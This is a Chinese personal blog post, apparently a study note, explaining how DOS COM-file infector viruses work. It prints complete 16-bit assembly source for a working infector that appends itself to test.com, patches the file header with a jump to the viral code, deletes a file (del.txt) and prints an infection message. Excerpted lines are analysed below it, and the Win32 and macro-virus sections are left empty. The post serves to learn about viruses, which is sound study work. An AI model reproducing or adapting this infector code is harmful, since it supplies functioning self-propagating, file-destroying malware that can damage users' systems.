

<!DOCTYPE html>
<html lang="en" >



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="dos可执行文件病毒前置知识绝对映像dos操作系统通过将可执行文件直接复制到内存中来加载可执行文件，不进行重定位。 dos程序起点dos操作系统规定了程序起点偏移位100H。通过在源代码的开头加入（org 100H）来指定代码的起始偏移位100H 原理将病毒代码插入可执行文件的末尾，通过劫持程序执行流，使得程序开始后先执行病毒程序，之后再执行原本的程序。 实现源代码 123456789101112">
<meta property="og:type" content="article">
<meta property="og:title" content="文件型病毒">
<meta property="og:url" content="https://lafdrew.github.io/2024/11/05/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="dos可执行文件病毒前置知识绝对映像dos操作系统通过将可执行文件直接复制到内存中来加载可执行文件，不进行重定位。 dos程序起点dos操作系统规定了程序起点偏移位100H。通过在源代码的开头加入（org 100H）来指定代码的起始偏移位100H 原理将病毒代码插入可执行文件的末尾，通过劫持程序执行流，使得程序开始后先执行病毒程序，之后再执行原本的程序。 实现源代码 123456789101112">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://lafdrew.github.io/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92.assets/image-20241106141104914.png">
<meta property="og:image" content="https://lafdrew.github.io/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92.assets/image-20241106141252379.png">
<meta property="article:published_time" content="2024-11-05T12:39:33.000Z">
<meta property="article:modified_time" content="2024-11-06T06:32:32.687Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="病毒">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://lafdrew.github.io/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92.assets/image-20241106141104914.png">
  
  
  
  <title>文件型病毒 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"lafdrew.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>lafdrew的小站</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/2.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件型病毒"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-11-05 20:39" pubdate>
          November 5, 2024 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          586 words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          5 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">文件型病毒</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="dos可执行文件病毒"><a href="#dos可执行文件病毒" class="headerlink" title="dos可执行文件病毒"></a>dos可执行文件病毒</h2><h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><h4 id="绝对映像"><a href="#绝对映像" class="headerlink" title="绝对映像"></a>绝对映像</h4><p>dos操作系统通过将可执行文件直接复制到内存中来加载可执行文件，不进行重定位。</p>
<h4 id="dos程序起点"><a href="#dos程序起点" class="headerlink" title="dos程序起点"></a>dos程序起点</h4><p>dos操作系统规定了程序起点偏移位100H。通过在源代码的开头加入（org 100H）来指定代码的起始偏移位100H</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>将病毒代码插入可执行文件的末尾，通过劫持程序执行流，使得程序开始后先执行病毒程序，之后再执行原本的程序。</p>
<h3 id="实现"><a href="#实现" class="headerlink" title="实现"></a>实现</h3><p>源代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><code class="hljs asm">CSEG SEGMENT <br>ASSUME CS:CSEG,DS:CSEG,SS:CSEG <br>main PROC NEAR <br>mainstart: <br>CALL vstart ;病毒的代码开始处 <br>vstart: <br>POP SI ;得到当前地址 <br>MOV BP,SI ;保存当前地址 <br>PUSH SI <br>MOV AH,9 <br>ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串 <br>MOV DX,SI <br>INT 21h <br>POP SI <br>ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节 <br>MOV DI,100h ;目的地址 <br>MOV AX,DS:[SI] ;开始复制 <br>MOV DS:[DI],AX <br>INC SI <br>INC SI <br>INC DI <br>INC DI <br>MOV AX,DS:[SI] <br>MOV DS:[DI],AX <br>MOV SI,BP ;恢复地址值 <br>MOV DX,OFFSET delname-OFFSET vstart <br>ADD DX,SI <br>MOV AH,41h <br>INT 21h <br>MOV DX,OFFSET filename-OFFSET vstart ;得到文件名 <br>ADD DX,SI <br>MOV AL,02 <br>MOV AH,3dh ;写文件 <br>INT 21h <br>JC error <br> <br>MOV AX,4202h ;到文件尾 <br>XOR CX,CX <br>XOR DX,DX <br>INT 21h <br>MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方 <br>ADD DI,2 <br>ADD DI,SI <br>SUB AX,4 //?<br>MOV DS:[DI],AX <br>ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒 <br>MOV DX,SI <br>MOV vsizes,OFFSET vends-OFFSET mainstart <br>MOV CX,vsizes <br>MOV AH,40h <br>INT 21h <br>MOV SI,BP ;定位到文件头 <br>MOV AL,0 <br>XOR CX,CX <br>XOR DX,DX <br>MOV AH,42h <br>INT 21h <br>MOV AH,40h ;将新的文件头写入 <br>MOV CX,4 <br>MOV DX,OFFSET new4byte-OFFSET vstart <br>ADD DX,SI <br>INT 21h <br>MOV AH,3eh ;关闭文件 <br>INT 21h <br>error: <br>MOV AX,100h <br>PUSH AX <br>RET <br>main ENDP <br>yuan4byte: <br>RET ;占位符<br>DB 3 DUP (?) <br>vsizes DW 0 <br>new4byte DB &#x27;M&#x27;,0e9h,0,0 <br>filename DB &quot;test.com&quot;,0 <br>delname DB &quot;del.txt&quot;,0 <br>message DB &quot;You are infected by a simple com virus~~&quot; <br>DB 0dh,0ah,&quot;$&quot; <br>vends: <br>start: <br>MOV AX,CSEG <br>MOV DS,AX <br>MOV SS,AX <br>CALL main <br>MOV AX,4c00h <br>INT 21h <br>CSEG ENDS <br>END start<br><br></code></pre></td></tr></table></figure>

<p>关键代码分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs asm">MOV AX,4202h ;到文件尾 <br>XOR CX,CX <br>XOR DX,DX <br>INT 21h <br>MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方 <br>ADD DI,2 <br>ADD DI,SI <br>SUB AX,4 //?<br>MOV DS:[DI],AX <br></code></pre></td></tr></table></figure>

<p>这段代码是用来计算要跳转的位置，并且存储（这里的跳转不懂为什么要到末尾向前移动四个字节）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs asm">MOV AH,40h ;将新的文件头写入 <br>MOV CX,4 <br>MOV DX,OFFSET new4byte-OFFSET vstart <br>ADD DX,SI <br>INT 21h <br></code></pre></td></tr></table></figure>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs routeros">AH = 40h的功能<br>DS:<span class="hljs-attribute">DX</span>=数据缓冲区地址<br><span class="hljs-attribute">BX</span>=文件代号<br><span class="hljs-attribute">CX</span>=写入的字节数<br></code></pre></td></tr></table></figure>

<p>这段代码向文件写入新的文件头 new4byte DB ‘M’,0e9h,0,0 后两个字节为跳转的地址，其中e9为jmp指令的机器码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs asm">ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒 <br>MOV DX,SI <br>MOV vsizes,OFFSET vends-OFFSET mainstart <br>MOV CX,vsizes <br>MOV AH,40h <br>INT 21h <br></code></pre></td></tr></table></figure>

<p>写入病毒</p>
<h3 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h3><p><img src="/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92.assets/image-20241106141104914.png" srcset="/img/loading.gif" lazyload alt="image-20241106141104914"></p>
<p>可以看到修改后的文件头为 e9  <strong>032fh</strong>,程序在打开后会跳转到032fh的位置</p>
<p><img src="/%E6%96%87%E4%BB%B6%E5%9E%8B%E7%97%85%E6%AF%92.assets/image-20241106141252379.png" srcset="/img/loading.gif" lazyload alt="image-20241106141252379"></p>
<p>可以看到032f向后四个字节就是病毒代码的开始</p>
<h2 id="win32可执行文件病毒"><a href="#win32可执行文件病毒" class="headerlink" title="win32可执行文件病毒"></a>win32可执行文件病毒</h2><h2 id="宏病毒"><a href="#宏病毒" class="headerlink" title="宏病毒"></a>宏病毒</h2>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%97%85%E6%AF%92/" class="category-chain-item">计算机病毒</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E7%97%85%E6%AF%92/" class="print-no-link">#病毒</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件型病毒</div>
      <div>https://lafdrew.github.io/2024/11/05/文件型病毒/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>November 5, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/03/17/Buffer%20Overflow%20in%20upload.cgi%20of%20WINSTAR_WN572HP3%20Device/" title="Buffer Overflow in upload.cgi of WINSTAR_WN572HP3 Device">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Buffer Overflow in upload.cgi of WINSTAR_WN572HP3 Device</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/06/24/dll%E6%B3%A8%E5%85%A5/" title="dll注入">
                        <span class="hidden-mobile">dll注入</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script>
  <link defer rel="stylesheet" href="/css/backgroundize.css" />
  <!-- hexo injector body_end end --></body>
</html>
